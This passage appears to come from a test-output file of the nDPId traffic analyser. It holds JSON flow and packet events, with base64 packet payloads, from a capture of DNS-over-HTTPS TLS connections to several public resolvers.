HCaZSQQHUSMY1BTylXmW622\/10lQS8aN1mce++r7\/TAswiTbum59NRH+1WXDpTaq5aRBgs7Pc6pr4lABNwxmieRHx0ER8V5gmxNVB9ACpzjEkp28DmYAH1\/iiBQfjkW2oblAVhUqcezWZUUEbpTbTAEj81Dzg+Fe2EsJFV2MiLhqH0ZMEkKY9oMnGyGvqY11wK7Qf4HXmtakoM3CF+wPbb9he7ffoRbYXCwbxTcDrBSEJdjOMhsSClbW03C9LGM4s6RAprMpnuw2wArtlzcr4bo701pOupS\/tdL5NkaZ2ZzsCChcDAwBgOnNpVcvc5YFZ3YuA8YRoqsuLDn4GImAnVqFIX3IzoTnZe29KOqUXQC0V61jJdr5Jnb3k3MOCdTH2u+HBBkKmYvlFb8GpDbcgObm2pFs9vNSY1WNyfnlLuFSQCBkHWe0UFwMDAEV7D2ZJm3CG6uFedmkozBwacoDrnHkQN6RCxC8K2l8lcKCSu3Q0j3XFRWsykB64fgtOqxtlPlxXpmtKrFqiyWDCeX9Q+Jw="} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946739603374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739603374,"pkt":"REREREREZmZmZmZmCABFAAB4XkhAAKYGo2gKAAABCQkJCsqGAbs6mT0PwXrZJFAYAfXTOQAAFAMDAAEBFwMDAEXJf2y8xWhMhAZA2WXz9agwI9f91RKP49sWLlsKAqD2Anz18+mnUXeRrd7MefwrF\/wulkzvUzp\/PNHsE\/j94eCMWT0CzeI="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739661512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739661512,"pkt":"REREREREZmZmZmZmCABFAAFFx6JAAK8GN2cKAAABuetRAa6gAbuz5lknlG0\/21AYAfbM4AAAFgMBARgBAAEUAwMfgFJ2Kafn6OC8bsQNsKFbNXsDyxgypaGgbuYoVgNdqiAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIIH2RRfX3PNaXYMOoXj3ynNGqfHChI6\/gAXerDGvzggi"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739661535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739661535,"pkt":"ZmZmZmZmRERERERECABFAAxS7o9AADQGgG2561EBCgAAAQG7rqCUbT\/bs+ZaRFAYA+rX7QAAFgMDAHoCAAB2AwOIv9853ekbZoNmLmgcqNPyyS1j9KmZm6LL1EB3x+W+MyAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3BMCAAAuACsAAgMEADMAJAAdACD6x6OWYowjGpQ7hpL1\/XAvKAPz7Qey4KV7v02zhqXZdBQDAwABARcDAwAgyc0HM+W8H8TE3DEJWTZrLIbavzRZjtX85L8RdcWlDvUXAwMKE3Ep4ySuvwn1mgGngq567huqNt4kq0krhrI\/h93Xu5m86O9X2PLgikjAQ\/f9b0D4TlJnxV9cGU04GfVlCuVdBuDl1OIowNDzv97yB1hnS\/nmnSeVxy1F8D7\/C2lvCqf2cxAVE09ueyG1Z8bXZ2QECTYKbWaJhHhH3grXMLxM9TK7dwfYp5ry3mgBLj8Im1sBBtK1ijR5DOPlXD4i38GWBdXuEFX66BB\/RJoRwVEIncNbQelSZeCqjUb3u++TUwMNQylDBUpnEAe47WxBvCiB3j4t00aQSmqM0TAluU8dwn7tiUiJEwAYZgDG8XeCA2d8CwkyaaNUs0P3Rp5Ub77dFKLlWkM7Ox84gnAyRhVMHCmMumYMkWKlAivuj\/eXgWwWByB6smKGxdGHvMorcYTbQq9mZYmNNNkDPDaVaw5533PFvpx4ba99q1b36RpLWXBUvp3e8mh0pBow5UcR930tP8k9y3Mp\/Hul\/USMW6fOtKvrODulyByiQtZSjqe6z4\/9jz9br68\/R0pBmxYIdiwDh9sAHDejB9VSYvk7ssbBQpn+Jgwnz6Ryy+sDgPoInVRafSLVQ2XaqYm5f6C0Jwzhr6UtNZ4\/zNTcpzOWnfrCB0SA4OuUkh\/XzE\/16DFk8ZQDliBoueyPhn8cEizoLe43IQ4BRx1FGhFopJsvL2cINLJIZh8DTM\/8W7f\/ASccXTbKN3NreGL2zPJ9HkyArzmAuS0H6AWBUpZyjU0X4LPypLaoIp74s3Z6LMGrDv+Q9HPcSM3AsvYaPpVMikXZgrncjZjmSO3nKjVK7tuPHzmBxV2ASbUY9dkYy7qS1LbwD5HCaZkMJLquTC43\/zrZa9Cf+VJlQO+7\/bTkI19jV7MBsNxvCJS3vho32OcNSgskst5WCDisQYxOEJ7yIiJ4Qj131r3komITCdIi6sfPNECBD925ao9iSOw1a3NghVbKi1Ke9+osy6p4OIfl7R\/jJIRkFpjTHB9lrhuKyd3x90HahF\/Bgrc+0OPDW3df50BV25QUTv0YHg583iZZwuimhgpeeN8oRbZn4Oz1sb61wMILMVA1YkIFgELm6QWH0EjBDa5PcdPXwcXSRAXJR2\/zX8giHU9oVoqfNaIjA+SmyaolS9o0C9Gxx9xhkTFg+SAbN3Goh5osUJrTzgif84rF3v\/clkf8\/ZhPyDROa9H0yWh+TK3VY9NLRXxv12lS5FZMqutTNAtmppSaz1n5imbXVp1Da9\/rGuGJgyHbUPRjpcY\/qQ4nrdYPUt0lBpjbxyw
R21B5bH94VrAutoZgT1NlpA1fjy8uX6CC\/PzzpWgwoLz2\/ah06JLAEuj5ndY\/3P\/Cea86JZSQRIAOkxHfXLLrlrueGx1dvDahl9VAk02WVblMiy86oo72YX2jdNNf7IRMOaPtI08s6slCfPDpn3bANNyLKCX6T8oskMhdiK\/HIjCb1KyAdgQ2+yLvi3d+MuMeWmC07amcrbn+OTYQQNPWx6i\/o5VJfAp896EdOSd0n7JnPYzTA1M2RyiA5D2thGuZ18x5oW4andkKefpZLKocbhraKqdRDR2qHe1UOjP7ac97YdAdmgxzkuJnD41fZ8SEi5Zg3NfdmEEfpkvRjC5orTLd0fIsx5c1+XLU\/R3b4bQM96DkiRuZJ1NUlIhf9JvTA7QhsNS9Evhm+KxSrzo4fPncRHMt8lm5+VkFq5jZsS\/4aS9tmtMGO7fcr\/LpSveCPtAloCQrU+vhpaXaC4\/SCuRji5PdK182R618OsLro46yH5FqoSw3EFuupxW4KHdDcJyAmbvTP3RLz1SxCnflYoAqTczyrDRGBg9\/VwVoEVI1F90s2UJwdF3wAnZAvtsFo0aX7P\/QLLigT0+21EtehOsx99nALYpQP+Wes4pdBUuuM1hrGs4phO3GFIyYVSCdORl3bwKcDgUn6jxeA5jLALqAkUQz6oQZAw+UAmaFT7liB5ZMHspe2Nk5qb3bDaj1FmXHIWt\/85M5M02qebtth3yNCkr6Yp8QH7DkvUBEcBvugZfGdO8uohym\/eNU58r4tZ+dX\/tuHtfYu\/HTthyF6zJIA5NCwZI8ZPOa0Ik2ZVHuDdccBZzRFIr6iS6N658h5UD2w34\/Zc25OfWHIIyNU8f8\/IYCk9XVJNve0Okk42KtkEZEvU5b0G1QgC8PnK8r+XSR+vGYlx30IHhP0Drstay6UqCpdjb38zyt16Qx9KI1K78\/2x0ZLR7g9lNe5aJSm2DGdBsBLk1r5a74FD95UK8Adgld6WS3J1isO2nKe9Xs1y3yG0BHL6PVzcVJ6xLZkhyj81HERDbvsw89dCQ0RJq5YmEae+boIDnKyAnLYzUgmbMRlc1g8JOgQmr6\/NRcNQVzPj9Tmr7h+4nauDzZ0EwSB6bpnhekE6zTzsN8ksFy6WPV1V2TWaFMCxIJpm4tqxJloTCvFyT3CBtW57hPqqD33WSzMFQ4mYuH5Kgu\/JydyuTxbX33iR4YxYd7QhqiqEqf7Z40jPc99ZwAIj52PTzQ7U+ojkqP4MuUynWiVDvS\/8M2\/Vvth6PA4ClC+NG9V0jqT2CwEy0LU0ERe0qEd656+zZx\/fgC3xfIuWV0svyqgeH7U8anrlDCpp7N40O2SWqb3L3JMSf4o49g5Y7jySS1fW2+m5VjaQqCccoq+\/wn0QIhjH7Xd2oER1gcyADsjGJt5aqBudWst9NAdC7\/E6mgwXOhZmtXb1lcPmN1A3ldDXRkgXTncFzTkiGIgqqygowkLd1h\/u0K8p6hXN6SporJbwLrTenWrNDIG63gFBLm2D7U+S642eghPumVgo7B1N6elGvUpSDX3m8qB6zRisoSKoWKWO5xgUo0OWMndotDAaZPAq3bhL2Pxzdl9WOKnnP6NOK4+F4BC3OgZgYIEUhrknbM3wBtdHfsfGuj0RFj5lNw2AlFe8pNBDRkjYdmUdc0f\/vnWwnfo22NWKX1BdiVu7196lmWb3TQ4gFhlK81yNy7eFJuFbgrYZ5PUlfjIwTDgxIXshraxns8270zwqor2u3QZYQoN4I1EUcEja7lh2qdAWxfca\/zxpKtNeCFUm8zfvAy2hjwmAqVnw7n4Et+Xyf9ksFEQ4\/qzsOHpBM0zGs5xxH5dXSgC84hPug8TuHm5XeS02QK5ivwcMFrRGIBts0M6ytr6tm6t5af5Z2U58e0QlvyTSXCPiJUK3gUQUYViS\/IjXLR2ycg4306mXwXdbQ8v7MG8Jbo+42mtOwsAND+
01bl1fOhl5IjO\/hKWjGNBJndlQaRfYzoY1bNcjrUVpsWniWOjJBYJ9yapHVp6DQ0QxTAp4enh41yjjXkuC9cO0IfBYAr0q3doev3F6MDmfD3QC30o0nnTuJKglBmQmNqmFF98Ioa6LYtVQSVj9fT7Jq0Jj7\/w6McuInFQUSdd3NIs7zDF4f1McMigXXd3svv1byyFwMDARmEZ3FvSkJXAws42ybGrYb\/Ga9WUTit+emudCQdO3qxSLRL9Xz90Zj\/0AIfatwlfnnVgLFc5QxTIdMvpyCnIjSAcDaEJvu6yM03S3K45PurYyNI6VNrD8T3C7JZ2oGRKr9xNDuiMdmtC9\/9YGpIp8JcXSnnpIql+dalqpwG9n50trcQI0C4J+hm1Yu6USN4wzVC+tr3gsW6PyyDAAs17vVbo+Scs5p00FZ1o\/rHfMtLfFwh8MAYWoGvtptGh9N2zS+PrJ1tBcSPIWnstLtsnAnrYxfC9FGgvCH\/DigiWfhGZwyoa504FzWxS6CzOvDPhsC522yXw\/\/MDJuJbpdH1g+oBnB701N1aymW+zBchXMoA1YOfcUScPREsxcDAwBF82UTEIbXenVn7eF73krbJp8pjxkB3FH+h3306Rr5JIHM3AbirkPdWnHupm94YxIhIDqYUbC9YcWD3w0dLlmwNJiAVT\/+"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946739661537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739661537,"pkt":"REREREREZmZmZmZmCABFAAB4x6RAAK8GODIKAAABuetRAa6gAbuz5lpElG1MBVAYAfXMEwAAFAMDAAEBFwMDAEU4SkGRhTVOzjkja1xO2w+N\/vz+OkRmcdhLqaqpXQNb6A6SRcM4Xi9F7CyJ7zWjY541e0wZEZOfbwCMOI4VGHKGlHVB\/Ow="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739879619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739879619,"pkt":"REREREREZmZmZmZmCABFAAFIcKVAAGQGIToKAAAB0frxGYueAbsFpAMoj2Q4kFAYAfaFCwAAFgMBARsBAAEXAwNRmx2nSkx+6m6KcnM1jGr2d9+E6hEUWeU+Rct80JF14yBFUW7fbN2m28L3JLX9K8uSgoBCeEP2oBBIn6aFnchRZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILzmWxHpwarRt4Ej829OBgtUnpC5uzX3e58yGu+riJtB"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-03223{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739879647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAgoIhBAADcGle\/R+vEZCgAAAQG7i56PZDiQBaQESFAYAfWL6wAAFgMDAGYCAABiAwOvuIoBv9aLdY9+pRuVYLTvaIEBB5j8JJqoUP\/T+o4DJyAaq0H4FgIYS60khmCU6D9TGVas7XFToGUgExNzFU9aPcAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHA
AAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946739879647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAXxIhJAADcGmCTR+vEZCgAAAQG7i56PZECQBaQESFAYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1eP
